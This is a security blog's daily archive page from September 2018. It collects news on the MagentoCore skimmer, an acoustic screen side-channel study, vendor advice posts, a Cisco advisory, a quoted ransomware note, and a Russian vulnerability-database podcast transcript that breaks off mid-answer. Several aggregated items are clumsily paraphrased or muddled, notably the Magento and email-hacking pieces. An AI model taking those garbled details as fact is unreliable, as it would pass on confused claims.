Daily Archives: September 4, 2018

E-Commerce Websites On MagentoCore Malware’s Hit List

E-Commerce Websites On MagentoCore Malware’s Hit List


A Dutch researcher and security blogger uncovered the infection that was being faced by the e-commerce websites that were using Magento software. Thousand were being stolen by this very malware.

MagentoCore as the malware is named is a major predator of the e-commerce sites that use Magento. Over 50 different websites are being attacked every day and the skimmer had been installed in more than 7300 online stores in recent times, according to sources.
 

The list of the attacked includes multi-million dollar organizations ensuring that the cyber-predators are wresting a smashing profit out of these companies. But the customers unquestionably are the veritable victims as their identity and cards get endangered, ultimately.

Course of Action
The malware begins with the ‘Brute-Force’ attack in which the malware attempts to predict the password of the Magento Admin panel and then after the access is acquired a malicious code is injected to the HTML and that helps to record the keystrokes of all the customers. The data that is sent to the hacker’s server is filled with the usernames, passwords credit card details and personal information.

Recovery Mechanism
A recovery system that deleted the code the moment it was made to run was discovered too. Over 220000 websites were analysed by a researcher. Out of which 4.2% were exposing the information and personal details of the users.

De Groot, a researcher advised all the organizations that suspected themselves of being affected by the precarious malware to follow a particular set of actions out of which the first and the foremost was to realize how exactly the malware got into action and protection against any further chances. Moreover, an analysis of the access logs and staff IPs in major working hours must be done so as to ensure that no staff software is infected with the malware and that the attacker has not hijacked the authorised session.

As per De Groot, all the defunct or potentially dead online stores should donate their domain names so that attacks that could happen in the future and those in the past could be tracked down.

BSides Idaho Falls Preview: Cyber Security Defense Maturity Model

Organizations receive mass amounts of data daily regarding cyber security risks. Too many companies set their cyber security defense strategy based on news stories, vendors and/or a “whack a mole” approach. My discussion reviews a unique cyber security defensive maturity model (CSDMM) providing security professionals a much clearer understanding of their defensive maturity and capability […]… Read More

The post BSides Idaho Falls Preview: Cyber Security Defense Maturity Model appeared first on The State of Security.

An EHR Systems Check-Up: 3 Use Cases for Updating Cyber Hygiene

Have you ever wondered how much your patient health record could garner on the black market? Whereas a cybercriminal only needs to shell out a mere dollar for your social security number, your electronic health record (EHR) is likely to sell for something closer to the tune of $50. This is according to research firm […]… Read More

The post An EHR Systems Check-Up: 3 Use Cases for Updating Cyber Hygiene appeared first on The State of Security.

SN 679: SonarSnoop

This week we cover the expected exploitation of the most recent Apache STRUTS vulnerability, a temporary interim patch for the Windows 0-day privilege elevation, an information disclosure vulnerability in all Android devices, Instagram's moves to tighten things up, another OpenSSH information disclosure problem, an unexpected outcome of the GDPR legislation and sky high fines, the return of the Misfortune Cookie, many thousands of Magneto commerce sites are being exploited, a fundamental design flaw in the TPM v2.0 spec, trouble with Mitre's CVE service, Mozilla's welcome plans to further control tracking, a gratuitous round of Win10 patches from Microsoft.... and then a working sonar system which tracks smartphone finger movements!

We invite you to read our show notes!

Hosts: Steve Gibson and Jason Howell

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Sponsors:

Risky Business #512 — Five Eyes nations send clear message on encryption

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Five Eyes nations send a clear message on encryption
  • Massive Azure outage
  • FBI releases political campaign security guidance
  • Google wants to kill the URL
  • MEGA.nz plugin owned sideways
  • Final “Celebgate” hacker sentenced
  • Google launches font fuzzing tool
  • Chinese-made Google/Feitian U2F keys under scrutiny
  • Some interesting TPM research
  • MUCH MORE

This week’s podcast is brought to you by AttackIQ.

AttackIQ founder Stephan Chenette will be along in this week’s sponsor interview to talk to us about a few things – the MITRE attack matrix being one. He’ll also share with us his view that EDR is the most commonly misconfigured security technology he sees out there, and he has pretty good visibilty into things like that because AttackIQ, of course, makes attack simulation software designed to measure the efficacy of these types of solutions.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Hackers can spy on your computer screens through the webcam microphone

Hackers can snoop on your computer screen just by listening to your webcam’s microphone

While covering your webcam could be a definite strategy to keep away webcam hackers, but what would you do if come to know that someone may be watching your every move or listening to your every word while you are using a webcam microphone. Scary, isn’t it?

A team of researchers has discovered that hackers can remotely spy on a computer screen by listening in with a microphone.

The hacker can listen to acoustic noises coming from within computer screens and can be used to detect the content displayed on the screens.

In other words, anyone with good technical knowledge knows-how can easily snoop on someone’s computer activities.

The side-channel attack dubbed as “Synesthesia” by the researchers can reveal the contents of a remote screen, providing access to potentially sensitive information based only on “content-dependent acoustic leakage from LCD screens.” LCD screens with both CCFL and LED backlighting are affected.

Also Read- Hackers Can Hack Your Computer If It Has Blinking LED Lights

According to the researchers, the subtle acoustic noises can be picked up by ordinary microphones built into webcams or screens, or even by a smartphone or “smart speaker” placed on a desk next to the screen, or from as far as 10 meters away using a parabolic microphone, or over an attached webcam microphone during a Skype, Google Hangouts, or other streaming audio chat, or through recordings from a nearby device, such as a Google Home or Amazon Echo.

“The pertinent sounds are so faint and high-pitched that they are well-nigh inaudible to the human ear, and thus (unlike with mechanical peripherals) users have no reason to suspect that these emanations exist and that information about their screen content is being conveyed to anyone who receives the audio stream, or even a retroactive recording,” according to the study.

“In fact, users often make an effort to place their webcam (and thus, microphone) in close proximity to the screen, in order to maintain eye contact during the video conference, thereby offering high-quality measurements to would-be attackers.”

The researchers created an experimental setup that attempted to recognize simple, repetitive patterns. “We created a simple program that displays patterns of alternating horizontal black and white stripes of equal thickness (in pixels), which we shall refer to as Zebras.

The period of a Zebra is the distance, in pixels, between two adjacent black stripes,” the researchers recounted in their paper.

As the program ran, the team recorded the sound emitted by a Soyo DYLM2086 screen while displaying different such Zebras. With each different period of stripes, the frequency of the ultrasonic noise shifted in a predictable manner. With the help of specially-trained machine learning algorithm, the researchers were able to then translate the recordings.

Also Read- Researchers hack air-gapped computer using electromagnetic pulses

The team was also able to identify which of the 10 most popular websites were displayed on a monitor with 96.5 percent accuracy.

The study was carried out by researchers from the University of Michigan, University of Pennsylvania and Tel Aviv University. You can read all the details about the study here.

The post Hackers can spy on your computer screens through the webcam microphone appeared first on TechWorm.

Imperva Recognized as a 2018 Gartner Magic Quadrant WAF Leader, Five Years Running

Gartner has named Imperva as a Leader in the 2018 Gartner Magic Quadrant for Web Application Firewalls (WAF) — for the fifth year in a row!

Our combination of on-premises appliances, cloud WAF, shared threat intelligence and flexible licensing once again cement us as the best choice for companies to protect their websites and applications.

Having recently added attack analytics and role-based administration capabilities to our offering, Imperva offers flexible deployment options to maintain full protection as application environments continue to shift.

Web Application Attacks a Leading Cause of Data Breaches

According to the 2018 Verizon Data Breach Investigations Report (DBIR), web application attacks once again rank as the leading cause of data breaches. Out of more than 2,216 data breaches this year so far, 48% resulted from hacks, with denial of service (DoS) attacks taking the top spot.

While the numbers sure help us understand the scale of attacks, the DBIR adds that “the focus should be less on the number of incidents and more on realizing that the degree of certainty that they will occur is almost in the same class as death and taxes.”

Your Apps Are Safer in Our Corner

As enterprises move applications to private and public cloud infrastructures, it becomes more important to adopt solutions that can be adapted to any cloud provider or any on-premises deployment. The Imperva WAF product line does exactly that.

Onwards and upwards

As one of the world’s leading cybersecurity companies, we continue to expand the Imperva WAF offering in a flexible configuration of on-premises and cloud WAF services. In addition, the launch of attack analytics gives our customers greater granularity when analyzing security events, distilling thousands of alerts into a handful of actionable narratives

Read the 2018 Gartner Magic Quadrant for Web Application Firewalls report to learn more.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Imperva. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

A Look Back at the Equifax Data Breach, One Year Later

WannaCry, Petya, and Equifax first come to mind when you think of the most impactful cyber events in recent years, with the first-year anniversary of the latter coming up September 7th. Impacting nearly 150 million Americans (essentially half the country), the breach changed the nature of identity theft. Now, just before its anniversary, let’s take a look back on the impact of the Equifax data breach, what it all means for consumers, and the current state of identity theft.

Equifax reported that the breach exposed as many as 147.9 million consumer accounts, potentially compromising information such as names, dates of birth, addresses, and Social Security numbers.

To its credit, Equifax launched a program to alert potentially affected consumers that their data may have been exposed, and offered a free year subscription to its credit monitoring service, TrustID.

Unfortunately, identity theft breaches are not an uncommon occurrence. Such incidents are up 44% overall with 1,579 reports last year, and there are likely even more that went unreported. Exposed records due to data breaches are up 389%. Roughly 179 million records have been stolen, with 14.2 million credit card numbers exposed in 2017, an 88% increase over 2016. What’s more, 158 million Social Security numbers were exposed last year, an increase of more than 8 times from 2016. And all this theft has added up – consumers reported $905 million in total fraud losses last year, a 21% increase. So, it only makes sense that identity theft ranked as roughly 14% of all consumer complaints to the FTC last year.

However, despite all the publicity about major data breaches, consumers have done very little or have changed very little largely due to optimism bias. In fact, a recent McAfee survey shows that despite increased consumer concerns, only 37% of individuals use an identity theft protection solution and 28% have no plans to sign up for an ID theft protection solution.

So now the next question is, what should consumers do to protect themselves against identity theft? Start by following these tips:

  • Place a fraud alert. If you know your data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account. Then, make sure you correct your credit report by filing a dispute with each of the three credit bureaus.
  • Freeze your credit. This allows you to seal your credit reports so no one else can take out new accounts or loans in your name. You can do this without impacting your existing lines of credit, such as credit cards. If you want to apply for services or open new accounts, you can temporarily “unfreeze” your credit using a personal identification code only you have.
  • Invest in an identity theft monitoring and recovery solution. With the increase in data breaches, people everywhere are facing the possibility of identity theft. That’s precisely why they should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post A Look Back at the Equifax Data Breach, One Year Later appeared first on McAfee Blogs.

Protecting user identities

Image of four hands collaborating over a drawing of a lightbulb.

This is a blog series that responds to common questions we receive from customers about the deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Cybersecurity threats: How to discover, remediate, and mitigate, the third blog in our eight-part series on deploying Intelligent Security scenarios.

Its not just a problem for consumers. Identity theft in the workplace is also on the riseand with good reason. Stealing employee credentials is an easy path to bypassing security around sensitive data, making unauthorized purchases, and many other cybercrimes.

Microsoft 365 security solutions help you protect users and corporate accounts. By making identity the control plane, Microsoft 365 offerings manage identities as the first step to providing access to corporate resources and restricting users who are high risk. Tools like single sign-on (SSO), Multi-Factor Authentication (MFA), and Windows 10 Hello for Business help you secure access. Additionally, there are actions you can take if an identity is compromised and ways to lock down or wipe devices to protect sensitive data in case of loss or theft.

How do I provide secure access for my users?

Managing identities is the first step in protecting your environment. You can provision user identities through Azure Active Directory (Azure AD) and then connect to your on-premises Active Directory, allowing you to centralize identities for each user. Then you can set conditional access policies in Azure AD (Figure 1) for users in your organization. Conditional access policies allow you to control how users access cloud apps. You can set conditions that restrict access based on sign-in risk, user location, or client app, as well as only allowing access to managed devices. Start by implementing recommended identity access policies.

Managing user access is your next step. Azure AD SSO lets you manage authentication across devices, cloud apps, and on-premises apps with one user sign-in. Once you enable SSO, your employees can access resources in real-time on any device in addition to confidential or sensitive work documents away from the office. Next, deploy MFA in Azure AD to reauthenticate high-risk users, and take automated action to secure your network.

Figure 1. Set user policies using Azure AD conditional access.

Finally, encourage your employees to use Windows Hello for Business. Its a security feature that allows users unlock their device using their PCs camera, PIN, or their fingerprint.

How do I ensure that my employees credentials are not compromised?

Whats needed is a multi-layered approach to identity protection that goes beyond passwords and starts to identify risk even before a password is entered.

Early and active monitoring of potential threats is essential. With Azure AD Identity Protection, you get an overview of risk and vulnerabilities that may be affecting your organizations identities. You can then set up risk-based conditional access policies to automatically mitigate threats. Risk-based conditional access uses machine learning to identify high-risk users. For example, a user may be flagged based on unfamiliar locations or failed sign-ins from the same IP address. Once flagged, a user can be required to use MFA in Azure AD or be blocked altogether (Figure 1).

Another useful monitoring tool is Azure AD Privileged Identity Management (PIM). With Azure AD PIM, you can monitor admin access to resources and minimize the number of people who have access to them. By continuously monitoring these high access points, you limit vulnerabilities. You can configure Azure AD PIM in the Azure portal to generate alerts when theres suspicious or unsafe activity in your environment and then recommend mitigation strategies.

Along with monitoring, Microsoft 365 security solutions offer tools to better protect a users credentials. Windows Defender Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them, thus helping prevent unauthorized access to these secrets which can lead to credential theft attacks.

Deployment tips from the experts

Start by managing user identities as your control plane. Provision your user identities through Azure AD and use Azure AD Connect to integrate identities across Azure AD and your on-premises AD. Enable MFA for all administrators, set conditional access policies, and initiate SSO.

Manage your devices from the cloud. Managing employee devices remotely engenders productivity and bolsters security. Deploy Microsoft Intune as your mobile device manager for company- and employee-owned devices.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the Protect your users and their identity white paper. You can find additional security resources on Microsoft.com.

More blog posts from this series:

The post Protecting user identities appeared first on Microsoft Secure.

Cisco Unified Communications Manager IM & Presence Service Denial of Service Vulnerability

A vulnerability in the XCP Router service of the Cisco Unified Communications Manager IM & Presence Service (CUCM IM&P) and the Cisco TelePresence Video Communication Server (VCS) and Expressway could allow an unauthenticated, remote attacker to cause a temporary service outage for all IM&P users, resulting in a denial of service (DoS) condition.

The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a malicious IPv4 or IPv6 packet to an affected device on TCP port 7400. An exploit could allow the attacker to overread a buffer, resulting in a crash and restart of the XCP Router service.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180815-ucmimps-dos


Security Impact Rating: High
CVE: CVE-2018-0409

Salute to Teachers – The Architects of Tomorrow’s Digital India

The digital whiteboards have long replaced the squeaky blackboards, while emails and text messages are replacing messages pinned on the display boards in the corridors. Today, many schools have a Bring Your Own Device (BYOD) policy, making notebooks redundant. The education pattern is itself changing from general rote learning for all to the ‘Discovery’ methods. Children are encouraged to participate in  group activities, brainstorming etc. to make learning easier, more interesting and long-lasting. As the academic system is being revolutionized by technology, the teachers, who have the task of making tech work in schools, are working hard to adapt to the changing scenario.

Technology offers an enormous range of possibilities within the confines of the same old classroom, and teachers now have greater access to reading material on the internet to do fact checks, organize presentations, get students to prepare slide shows or study at their own pace – something that was not possible even a decade ago, when I was a full-time teacher.

I feel so excited therefore when educationists talk about new strategies and concepts to enable wholesome learning and development. What’s more wonderful is that parents too, are getting to be a constant part of their child’s daily activities in schools, thanks to videos and emails. Further, the internet has made the world a global village and teachers are smartly making the most of it. Tweet chats and dedicated discussion platforms on education have allowed teachers to share findings and learn from each other. Such forums allow teachers to stay abreast of new digital learning tools and ensure that their students are making the most of what tech has to offer. After all, only an aware teacher can impart the right knowledge to our digital children.

Therefore, it’s a win-win situation for both teachers and students, leading to vastly improved academic environment and global outlook in students.

If anyone argues (and we used to write essays on this in school) would robots replace teachers in the near future or are teachers becoming irrelevant, then my answer is an emphatic “NO” and I will tell you why.

Why do students need human teachers in the digital age?

  • The human touch and attention
  • To instill the right values and cyber etiquette
  • To teach discipline and responsibility
  • Offer the right guidance on web surfing in the age of fake profiles and fake news
  • Guidance on searching for information online

It’s not an easy task. If you examine what being a teacher in the digital age entails, here are some of the skills they need to have.

Digital Age teachers should be able to:

  • Bring about required changes to move towards digitalization of education
  • Think critically or think out of the box and encourage this trait in children too
  • Stay updated with the latest tech developments and familiarize themselves with current trends to be able to establish classroom order
  • Help students select the right digital tools and use them responsibly
  • Teach kids to safeguard their devices and their online environment
  • Understand digital literacy and teach kids digital etiquette and digital hygiene
  • Use social media effectively to connect with other educationists, parents and children
  • Assist parents to become tech-savvy and cybersafety aware

Three things that every teacher needs to tackle in school:

  • Cyberbullying: Classroom bullying has gone online. It has become quite rampant- ranging from the harmless leg-pulling to serious threats and abuse. Teachers need to keep an eagle eye out for such activities, educate children on future consequences and organize peer support groups for victims of bullying so that children can learn how to deal with bullies.
  • Online dares and risky challenges: Teens especially are attracted by such competitive tasks where they can prove themselves and earn peer approval. Children need to be educated early on about the associated risks so that know where to draw the line.
  • Oversharing: Children need constant guidance on what and how much to share for they lack the foresight to think of future consequences.

Sanitization and security of the digital world of children are of paramount interest and teachers are best placed to guide them on this. This includes using only those devices that have running licensed security tools like McAfee Total Protection, using strong passphrases or better still, password managers, and being mindful of their digital actions.

Teachers are truly the nation builders; they are moulding the future digital age citizens with the right knowledge and guidance. It’s a tough task, but they do it with elegance and a smile. Wishing all you teachers a very Happy Teacher’s Day, may your tribe flourish.

The post Salute to Teachers – The Architects of Tomorrow’s Digital India appeared first on McAfee Blogs.

Best VPN services of 2018: Reviews and buying advice

Trending: IoT Malware Attacks of 2018

Since January 1st of 2018, a barrage of cyberattacks and data breaches have hit almost every industry, targeting businesses large and small, many of which are now from IoT devices. By 2025, it is estimated that there will be approximately 75 billion connected devices around the world. With more IoT devices ­–from wearables and pacemakers to thermometers and smart plugs–on the market and in the home, cybercriminals are keen to leverage them in attacks. This heightened interest is due to the vulnerabilities in many IoT devices, not to mention their ability to connect to each other, which can form an IoT botnet.

In a botnet scenario, a network of internet-connected devices is infected with malware and controlled without the users’ knowledge, in order to launch ransomware and DDoS attacks (distributed denial-of-service). Once unleashed, the consequences of botnet attacks can be devastating. This possible reality sounds like the plot of a science fiction movie, one which we hypothesized in our 2018 Threats Prediction Report. As we head into this year’s final months, we take a look at how this year’s threats compared to our predictions for you, the consumer.

At the end of 2017, we predicted that the convenience and ease of a connected home could lead to a decrease in privacy. Our devices already transmit significant data, with or without the knowledge of the consumer, back to the corporations the devices are made. This unprecedented access to consumer data is what is driving cybercriminals to become more familiar with IoT botnet attacks. Just in 2018 alone, we’ve seen smart TVs, virtual assistants, and even smart plugs display detrimental security flaws that could be exploited by bad actors. Some IoT devices were used to facilitate botnet attacks, like an IoT thermometer and home Wi-Fi routers. In 2017, these security concerns were simply predictions- but now they are very much a reality. And while the window to get ahead of these attacks is closing, consumers need to be prepared in case your IoT devices go haywire.

Be the difference in your home when it comes to security and IoT devices. Protect both you and your family from these threats with these tips:

  • When buying an IoT device, make security a priority. Before your next IoT purchase, do your research. Prioritize purchasing devices that have been on the market for a while, have a name brand, or have a lot of online reviews. If you follow this protocol, the chances are that the device’s security standards will be higher, due to being vetted by the masses.
  • Change default device passwords. As soon as you bring a new device into your home, change the password to something difficult to guess. Cybercriminals often know the default settings and can use them to access your devices. If the device has advanced security options, use them.
  • Keep your software up-to-date. To protect against potential vulnerabilities, manufacturers often release software updates. Set your device to auto-update, if possible, so you always have the latest software.
  • Use a comprehensive security program. It’s important to think about security holistically. Not all IoT devices are restricted to the home; many are mobile (such as smart watches). If you’re out and about, you may need to connect to an unsecured network – say an airport with public Wi-Fi. Your kids may have devices. The scenarios may be different, but the risk is the same. Protect your network of connected devices no matter where you are and consider a suite of security products to protect what matters.

Interested in learning more about IoT and mobile security tips and trends? Stop by ProtectWhatMatters.online, and follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Trending: IoT Malware Attacks of 2018 appeared first on McAfee Blogs.

Cyber criminals are hacking emails, sending fake messages

Hackers are on the prowl, looking for your email data. From just seven cases of hacking email IDs in the city last year, the number has shot up to 13 so far this year. It turns out it doesn't take much for hackers to see what's being displayed on your computer screen.

Cybercrime police said fraudsters hack the victim’s email account and send fake emails to their contacts, stating that the victim is in dire need of money.

“After the account is hacked, emails are sent to all contacts of the victim stating the account holder’s family member is in the hospital and he or she urgently needs money. Thinking it’s true, the contacts transfer money to the given account details in the mail,” said Hyderabad additional deputy commissioner of police (cyber crime) Raghu Vir.

According to a police source, the Dark Web has become a marketplace of Gmail data. “Several fraudsters get hold of the information about accounts through Dark Web and use it to blackmail people and siphon off money,” the source added.

In a recent case, a 33-year-old businessman approached the Rachakonda Cyber crime police saying that he received a mail saying his account was hacked and his activities were being followed by the fraudsters. "The hacker claimed he knows what kind of pornography websites the victim was watching and threatened to send details to his family and friends," Rachakonda assistant commissioner of police, cybercrime, S Harinath said. "We asked him to get bank details of the hacker so that we can track him. Hyderabad police too had registered a similar case a month ago. However, the man refused to register a case due to stigma," the official added.

A team of researchers have discovered that ultrasonic sounds picked up by a webcam microphone can be analyzed using machine learning to determine what's being shown on a remote computer screen.

Former Head of a Country as a Brand of Malware?




It is unusual for sure as it so occurred interestingly in the historical backdrop of Ransomware swarming the home systems of the users that the face of a former Leader of a nation was taken up as the brand of a malware.

Truly, first tweeted by the MalwareHunterTeam, this ransomware has the peculiar title of,

"Barack Obama's Everlasting Blue Blackmail Virus"

This Windows-based malware is distributed through spam and phishing efforts with the aim to initially examine an infected system for processes related with antivirus solutions.Whenever executed, this ransomware is capable of terminating different procedures related with antivirus programming, for example, Kaspersky, McAfee, and Rising Antivirus.

The Obama ransomware then scans for documents ending with .EXE, before encoding them. It’s done as such that the registry keys related with the executable records are likewise influenced which thusly helps for instigating the virus each time an .EXE document is introduced and launched.

The message in the ransomware interface is shown alongside a picture of the previous US President Obama which states that users should contact the attacker at the mail 2200287831@qq.com for payment related directions.

Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.
So you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information.

The Ransomware more often than not encodes content, like documents and media to force victims to pay a blackmail 'expense' to recover their records and files and is distinguished by 45 out of 68 antivirus solutions, as indicated by VirusTotal, a virus scanning service.

Cybersecurity firms however prescribe for the affected users to not surrender in and pay if their system is infected with ransomware and for that they have even begun releasing free decoding keys consistently.



WordPress Database Upgrade Phishing Campaign

WordPress Database Upgrade Phishing Campaign

We have recently been notified of phishing emails that target WordPress users. The content informs site owners that their database requires an update and looks like this:

The email’s appearance resembles that of a legitimate WordPress update message, however the content includes typos and uses an older messaging style. Another suspicious item in the content is the deadline. WordPress wouldn’t define deadlines without a valid explanation, and hosting providers wouldn’t either (if you believed the email was from them).

Continue reading WordPress Database Upgrade Phishing Campaign at Sucuri Blog.

IDG Contributor Network: The thin host to serverless model is radically realigning your security responsibilities

In the not too distant future, the majority of new enterprise software deployments will be cloud-native, forever altering the information security team's core responsibilities. Picture a massive iceberg with only the tip visible above the surface of the water. Your cloud provider is responsible for the bulk beneath the surface - the infrastructure, networking, access control, etc. You are responsible for the tip - the application workload.

Google the term "AWS shared responsibility model" and you’ll find Amazon's AWS Shared Responsibility Model that, while specific to AWS, likely mirrors the security relationship you will have with any cloud provider.

To read this article in full, please click here

Russia’s Vulnerability Database Focuses Inward

Researchers from Recorded Future’s Insikt Group have previously analyzed both the U.S. and Chinese national vulnerability databases, examining the speed of publication of cybersecurity vulnerabilities, and how each respective country considers its NVD in the broader context of the national mission of cyber defense and operations. Recorded Future’s research team recently set their investigative sights on Russia’s vulnerability database to see how it compares.

Priscilla Moriuchi is director of strategic threat development at Recorded Future, and she joins us to share what they found.

This podcast was produced in partnership with the CyberWire.

For those of you who’d prefer to read, here’s the transcript:

This is Recorded Future, inside threat intelligence for cybersecurity.

Dave Bittner:

Hello everyone, and thanks for joining us for episode 72 of the Recorded Future podcast. I’m Dave Bittner from the CyberWire.

Researchers from Recorded Future’s Insikt Group have previously analyzed both the U.S. and Chinese national vulnerability databases, examining the speed of publication of cybersecurity threats and how each respective country considers its NVD in the broader context of the national mission of cyber defense and operations. Recorded Future’s research team recently set their investigative sights on Russia’s vulnerability database to see how it compares.

Priscilla Moriuchi is director of strategic threat development at Recorded Future, and she joins us to share what they found. Stay with us.

Priscilla Moriuchi:

We’ve done a bunch of research in the last year on various countries’ national vulnerability databases, particularly the U.S.’s and China’s, and we realized over the course of the last year that there are a lot of things you can learn about — not just vulnerabilities and how fast countries publish, but about the countries themselves, how they approach information security. From an intelligence perspective, we found that there was invaluable data for anticipating and maybe even preventing a cyber intrusion. So, we decided to apply that same technique to Russia’s national vulnerability database, which is run broadly by its military.

It’s a completely different setup. I don’t even know if I would call it a database, broadly, because it’s so incomplete, but it’s really a different setup than either the U.S.’s NVD or China’s, so we just dug into using kind of the same techniques — how they publish, when they publish — all kinds of stuff like that.

Dave Bittner:

So, before we dig into how Russia does what they do, can you give us a little brief overview of how the U.S. and how China handles theirs and the parts it plays in their overall attitude toward defense?

Priscilla Moriuchi:

So, the U.S.’s national vulnerability database, or NVD, was the first one to be stood up. The U.S. NVD is run by NIST, or the National Institute of Standards and Technologies, and it’s part of DHS and the Department of Commerce, jointly. It’s run mainly as a transparency function so that general consumers and businesses in the U.S. and across the world have a centralized repository for looking at vulnerabilities on their computers, responding to them, installing the patches, and upgrading their information security.

For most of the IT world, the U.S. NVD has the gold standard in terms of the content it publishes, the type of vulnerabilities it addresses, and the comprehension of its database. The other one we’ve taken a look at is China’s national vulnerability database, or CNNVD. This one is different from the U.S. NVD in that it’s run by their equivalent of the CIA, which is the Ministry of State Security. It’s run by an intelligence service. China’s vulnerability database is very fast in publishing vulnerabilities broadly. It’s faster than the United States. It includes some vulnerabilities that the United States database does not, but broadly, China’s database is used by its intelligence services to look for vulnerabilities that the intelligence services could be using in their own cyber operations.

So, China has done quite a poor job of balancing the kind of transparency and public service mission of a vulnerability database with the intelligence mission of the organization who runs it. So there’s quite a different application of vulnerability management than the United States database.

Dave Bittner:

And these databases are widely available to anyone? You don’t have to be a resident of a particular country to be able to see what’s in them?

Priscilla Moriuchi:

No, no, they’re available to everyone. It’s just a language barrier issue for most people. The U.S. database is in English, China’s is in Chinese, and Russia’s is in Russian.

Dave Bittner:

All right, well, take us through the background. What happened when Russia decided to spin up their own here?

Priscilla Moriuchi:

Yeah. So, Russia decided to start their own vulnerability database in 2014. That was about 14 years later than the United States, and at that point, you know, there’s 14 years of vulnerabilities for them to catch up on. Their database is sort of broadly known as the BDU. There’s not a great English translation for it, so just call it the BDU.

So in 2014, they started reporting vulnerabilities. There were about 1,000 reported that year, and then they really ramped up publication in 2015. Then, after that, publication went down again in 2016, ‘17, and ‘18 to much smaller … Maybe two to 3,000 vulnerabilities per year.

So, on average, you see, even though Russia started their vulnerability database quite a deal later than the United States, they only report about 10 percent of vulnerabilities that are identified globally. They only published 10 percent. Their vulnerability database, like I mentioned before, is run by the Russian military, by an organization there called Federal Service for Technical and Export Control, or FSTEC, as we refer to it.

The mission of that organization is not like the U.S. NIST. It’s a military-run organization. Its mission is to protect the information systems of Russia’s government and critical infrastructure. So, with Russia, our research dives into the fact that they don’t even pretend to have a public service mission like China does. They publish only vulnerabilities that are used on Russian information systems or in Russian critical infrastructure that they are concerned about protecting. So that’s a real contrast to both how the U.S. approaches vulnerability management and to how China approaches it as well.

Dave Bittner:

Now, the Russian database — does it end up being a subset of the U.S. database? It’s interesting to me that they didn’t start out by just vacuuming up our database and using that as a starting point.

Priscilla Moriuchi:

Yeah. It’s an interesting study because they could have very well done that, because like you said, especially the U.S. vulnerability database — it’s open to everyone. You can harvest the information from it. So, they could have started out with … I think at that point, in 2014, the U.S. had somewhere around 80,000 vulnerabilities, so they could have started out from that point.

Russia’s vulnerability database, also, is really slow. On average, the delay between the time that a vulnerability is revealed and by the time it’s published in the Russian database, even though they only publish 10 percent of all vulnerabilities, is 95 days. So it’s over three months, which is really substantial and it doesn’t make a lot of sense for anyone to really rely on that database.

Broadly, too, if you look at the technologies that they focus on — what we would call “over covering” — there are a number of technologies that they cover substantially more than 10 percent of the vulnerabilities for. These include widely-used software and hardware technologies and vendors like Adobe, Linux, Microsoft, Apple, Mozilla, Google, those types of things.

From our perspective, because of Russia’s overt mission, this database is explicitly for protecting Russian information systems. You can really learn more about what Russia has and what Russia runs on their own state information systems, than really about what Russia is seeking to target for cyber operations abroad.

Dave Bittner:

So this is more inward facing, I guess, to people within the organization to point out, “Hey, these are the things that deserve your attention.”

Priscilla Moriuchi:

Yes. So I think the other thing that we’ve learned is, there’s a couple of missions for FSTEC, this parent organization to the vulnerability database. First is publication of these vulnerabilities and providing what we would call a “baseline” for Russian information systems. They all must have patched all of these vulnerabilities, and the vulnerabilities in the BDU form that baseline. So there’s a standard baseline across Russian government information systems. Here is what it is — it’s in the BDU. Find it and do it.

The second part of this, though, is that the larger mission of FSTEC is to do what’s called these “reviews” of technology, or technology licensing. This is a technique that’s used to a certain extent by China as well, in which the government — the Russian or Chinese government — has mandated technology and product reviews of particularly foreign information technology that companies would like to sell in their domestic marketplaces.

And in this case, the government, FSTEC, requires that people or companies get a license, and in order to get that license, they have to subject their software or hardware to these technology reviews that are conducted by FSTEC. The reviews, in many cases, require a source code review by members of Russia’s military, which FSTEC is, and then they’ll hand out a license for a company to be able to sign in Russia.

The BDU is also a baseline of security for these technology licensing reviews, but it also provides a legitimate cover for the Russian military to point to and say, “Look, we also run this vulnerability disclosure program. We need to discover any vulnerabilities in your software to keep our own country’s information technology secure.”

So in that sense, it’s not just an ineptitude that Russia covers only 10 percent of vulnerabilities, or it’s not just that they’re concerned only about Russian information systems — which they primarily are — but it’s also a function of this technology review program and providing this kind of legitimate cover to say: “Here’s what we require. This is the technological security baseline for you. Look at our database. We are a legitimate public service organization as well.”

Dave Bittner:

Now, one of the things that you look at in your research here is, you contrast the database against known Russian APTs. Can you take us through what you learned there?

Priscilla Moriuchi:

